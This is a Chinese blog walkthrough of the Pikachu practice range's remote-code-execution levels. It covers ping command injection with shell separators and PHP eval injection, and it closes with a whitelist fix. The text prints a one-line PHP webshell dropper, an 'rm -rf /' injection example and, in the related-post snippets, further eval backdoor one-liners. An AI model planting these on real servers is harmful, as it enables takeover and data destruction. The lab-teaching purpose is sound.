渗透小测试之pikachu靶场RCE练习

最新推荐文章于 2025-06-18 21:06:48 发布
最新推荐文章于 2025-06-18 21:06:48 发布
阅读量683 收藏 19
点赞数 13
CC 4.0 BY-SA版权
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/javatmnan/article/details/146539492

目录

RCE简介

RCE原理

靶场第一关——ping命令

靶场第二关——eval

RCE简介

RCE(Remote Code Execution)远程代码执行 是网络安全中危害性极高的漏洞类型,允许攻击者通过漏洞在目标系统上执行任意代码或命令,从而完全控制服务器或应用程序。

RCE原理

RCE 的核心在于目标系统对外部输入未充分过滤存在逻辑缺陷,导致攻击者可注入恶意代码。常见成因包括:

  1. 输入验证缺失
    用户输入(如表单、URL参数)未严格过滤,导致代码注入(如 eval($_GET['cmd']))。

  2. 命令注入
    系统命令拼接用户输入(如 os.system("ping " + user_input)),攻击者注入 ; rm -rf / 等命令。

  3. 反序列化漏洞
    未安全处理序列化数据(如 Java/Python 反序列化),触发恶意代码。

  4. 框架/组件漏洞
    依赖库或框架存在漏洞(如 Log4j2、Apache Struts)。

 靶场第一关——ping命令

此网站给了一个ping命令的输入框,输入网址就会对其进行ping测试

因为靶场是布置在windows下的,所以会有乱码,不过能ping成功就行

在黑盒测试中,由于不知道是windows还是linux,所以用(|,||,&&)这三个连接符

|(管道符)将前命令的输出作为后命令的输入无条件执行
||(逻辑或)前命令失败时,执行后命令。
&&(逻辑与)前命令成功时,执行后命令。

&(命令分隔符),无论前命令是否成功均执行后命令

命令用whoami

whoami 是一个简单但非常重要的命令行工具,用于显示当前登录用户的身份信息。在linux中whoami显示当前用户名,在windows中whoami显示用户完整标识(包括当前登录的域名和用户名)。所以用whoami可以判断操作系统是windows还是linux

判断出操作系统是windows,同时得到了域名和用户名

查看一下源码

 代码直接将用户输入的 $ip 拼接到系统命令中,未对输入内容进行合法性校验或转义。

使用 shell_exec() 执行操作系统命令,且拼接用户输入到命令字符串中,形成注入点。

靶场第二关——eval

eval函数的作用是在编程中用于将字符串作为代码来执行

因此这题的意思是系统将用户输入的内容当做代码执行

我们试试看,输入phpinfo();

果然,phpinfo();被执行了

那么我们可以输入一句木马

fputs(fopen('shell.php','w'),'<?php assert($_POST[123]);?>');

 执行完成后查看目录,发现木马创建成功

使用蚁剑连接

连接成功

看看源码

直接通过 $_POST['txt'] 获取用户输入,未经过滤或限制。 

可以增加白名单机制

$input = $_POST['txt'];
if (!preg_match('/^[0-9+\-*\/() ]+$/', $input)) {
    die("非法输入!");
}

限制用户输入的内容 

wanxinmin
关注
pikachu练习----RCE
ptxybird的博客
11-09 4481
一、RCE概念学习 RCE英文全称:remote command/code execute,分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因:没有在输入口做输入处理。 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上,一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞。 Pi
Pikachu靶场练习总结
weixin_47387913的博客
03-05 3223
Pikachu靶场练习总结 前辈们好!作为一个进入安全行业的初学者,靶场练习必不可少,我将我对某些靶场练习的总结写在这里,错误之处请多多指正。 靶场pikachu 关卡:暴力破解 基于表单的暴力破解: 先看提示: 用户名和密码我们都是不清楚的,可建立密码库利用burp中的Intruder功能进行暴力破解,先通过Proxy截取报文,发送到Intruder中。 因为用户名和密码都是不清楚的,那么我们要添加username和password2个爆破选...
pikachu靶场RCE
nidaxin的博客
11-19 2161
第一道:说明: 1「ping」是用来探测本机与网络中另一主机之间是否可达的命令,如果两台主机之间ping不通,则表明这两台主机不能建立起连接。ping是定位网络通不通的一个重要手段。 2.ping 命令是基于 ICMP 协议来工作的,ping 命令会发送一份ICMP回显请求报文给目标主机,并等待目标主机返回ICMP回显应答。因为ICMP协议会要求目标主机在收到消息之后,必须返回ICMP应答消息给源主机,如果源主机在一定时间内收到了目标主机的应答,则表明两台主机之间网络是可达的。 3.ICMP协议简介I
九、pikachu靶场--rce
最新发布
weixin_74035741的博客
06-18 338
iKachu 靶场中的 RCE(Remote Command/Code Execute,远程命令 / 代码执行)漏洞是一种严重的安全漏洞,它允许攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。如果应用直接将用户输入(如 IP 地址)拼接到系统命令中而不进行过滤,攻击者可以注入额外的命令。若应用将用户可控的输入直接作为eval()的参数,攻击者可注入恶意 PHP代码,从而在服务器上执行任意命令。(3)输入system(“cact”);(2)输入 system(“whoami”);
pikachu 靶场 RCE
lee_maple的博客
11-19 3084
RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而,如果,设计者在完成该功能时,没有做严格的
Pikachu靶场--RCE
qq_65150735的博客
06-17 715
Pikachu靶场--RCE远程命令/代码执行
pikachu靶场实验操作
G6_12的博客
06-11 1342
Pikachu
pikachu靶场的安装以及使用
热门推荐
Christma1s的博客
03-04 3万+
pikachu是一个漏洞练习平台。其中包含了常见的web安全漏洞,如果你是一个渗透测试学习者没有靶场练手,那么pikachu将是一个不错的选择。 Pikachu上的漏洞类型列表如下: Burt Force(暴力破解漏洞) XSS(跨站脚本漏洞) CSRF(跨站请求伪造) SQL-Inject(SQL注入漏洞) RCE(远程命令/代码执行) Files Inclusion(文件包含漏洞) Unsaf...
渗透测试环境搭建PHPstudy+Pikachu
came_861的博客
12-20 349
渗透测试环境搭建PHPstudy+Pikachu
Apache2 Ubuntu靶场练习——XXE漏洞渗透
qq_48368964的博客
07-25 628
Apache2 Ubuntu Default Page 是一个包含xxe漏洞的页面,如何找到和利用xxe漏洞,并找到flag呢?1.御剑端口扫描2.bp抓包查询可利用漏洞3.利用已知漏洞查看关键文件信息4.简单的代码审计获取flag。
Pikachu(皮卡丘)靶场---RCE(remote command/code execute)
m0_74850066的博客
06-15 554
看看靶场的概述RCE(remote command/code execute)概述RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。
PiKachu靶场RCE(远程系统命令执行)
angry_program的博客
02-21 9096
概述 RCE(remote command/code execute)漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交...
Pikachu漏洞靶场 RCE(远程命令执行/代码执行)
柠檬i的博客
04-05 1712
RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口
Pikachu靶场——远程命令执行漏洞(RCE)
来日可期的博客
10-05 3210
远程命令执行(Remote Code Execution,RCE)是一种安全漏洞,攻击者可以通过该漏洞在远程服务器上执行恶意代码或命令。RCE 漏洞通常出现在应用程序或操作系统中,由于不正确的输入验证或处理而导致。一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上,一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如果设计者在
pikachu靶场的两道RCE
whisper921的博客
11-19 443
第一道题ping一个ip并查看当前目录 输入127.0.0.1,点击ping 出来一堆乱码 第一种方法 按win+r键, 输入regedit,点击确定,即打开注册表编辑器 打开HKEY_CURRENT_USER项 打开其中的Console项,查看有无CodePage项 若有,将值改为65001,若无,创建并修改值为65001,在该项下新建一个 DWORD(32位值),命名为 "CodePage",值设为 "65001"。 然后关闭注册表...
pikachu-RCE
ZhuoLLLLLL的博客
12-28 1113
因为这个命令不但windows和linux系统都支持(windows xp不默认支持,可安装),而且显示的内容不同,不但可以用来判断是否有远程命令执行漏洞,还可以用来判断操作系统(linux系统中显示当前执行操作的用户名,windows系统中显示当前登录的域名和用户名)如果设计者在此输入界面的功能上没有做严格的安全控制,攻击者就可以通过此接口注入恶意的命令,让后台执行,从而控制整个后台服务器。成功连接就能进入对方电脑的后台了,可以看到对方的所有文件,攻击成功!命令执行一般发生在远程,故被称为远程命令执行。
Pikachu靶场-RCE漏洞
sucker的博客
04-22 1131
防御需结合输入过滤、最小权限、代码审计等多层机制,同时及时更新依赖库和框架补丁。即使代码执行失败,攻击者仍可能通过盲注(Blind RCE)探测漏洞。:利用Struts2、Spring、Fastjson等框架的漏洞(如CVE-2017-5638)。:应用程序未对用户输入进行严格过滤,直接将输入内容拼接至系统命令、代码执行函数或反序列化过程中。:污染开源库(如PyPI、npm包)间接引入RCE。:反序列化未经验证的数据触发恶意代码(如Java的。:通过未授权接口执行系统命令(如路由器固件漏洞)。
pikachu靶场rce
03-29
### 关于Pikachu靶场中的RCE漏洞 Pikachu是一款专为Web安全学习设计的靶场系统,其中包含了多种常见的Web安全漏洞。对于初学者而言,它提供了一个理想的环境来实践和理解各种攻击向量[^1]。 #### RCE漏洞概述 远程代码执行(Remote Code Execution, RCE)是一种严重的安全漏洞,允许攻击者通过目标系统的应用程序运行任意代码。在Pikachu靶场中,存在多个场景模拟这种类型的漏洞。例如,在`exec "ping"`的功能实现上,如果未对用户输入进行严格过滤,则可能导致恶意命令注入并被执行[^2]。 #### 利用方法示例 以下是几种典型的RCE漏洞利用方式: 1. **创建反向Shell** 攻击者可以通过上传自定义PHP脚本的方式获取更高权限的操作界面。例如,下面这段代码可用于生成一个简单的后门程序: ```php <?php eval($_POST["cmd"]); ?> ``` 将上述内容写入服务器上的某个可访问位置(如`shell.php`),即可通过发送特定请求控制该服务端进程[^4]。 2. **文件操作指令嵌套** 另一种常见手法是在合法功能之外附加额外的动作。比如以下命令会尝试将一段恶意代码保存至临时文本文件中: ```bash echo "<?php @eval(\$_POST['cmd']); ?>" > mm.txt ``` 此外还可以进一步扩展成更复杂的逻辑链路以便长期维持连接通道[^5]。 #### 中文显示问题处理建议 当遇到因字符集不匹配引起的乱码现象时,可以在受影响页面顶部增加指定编码声明语句解决这个问题。具体做法如下所示: ```php header("Content-type:text/html;charset=gb2312"); ``` 不过需要注意的是,这样做可能会影响到其他部分正常展示效果;因此必要时候可以选择有条件启用或者完全移除这条设置行[^3]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值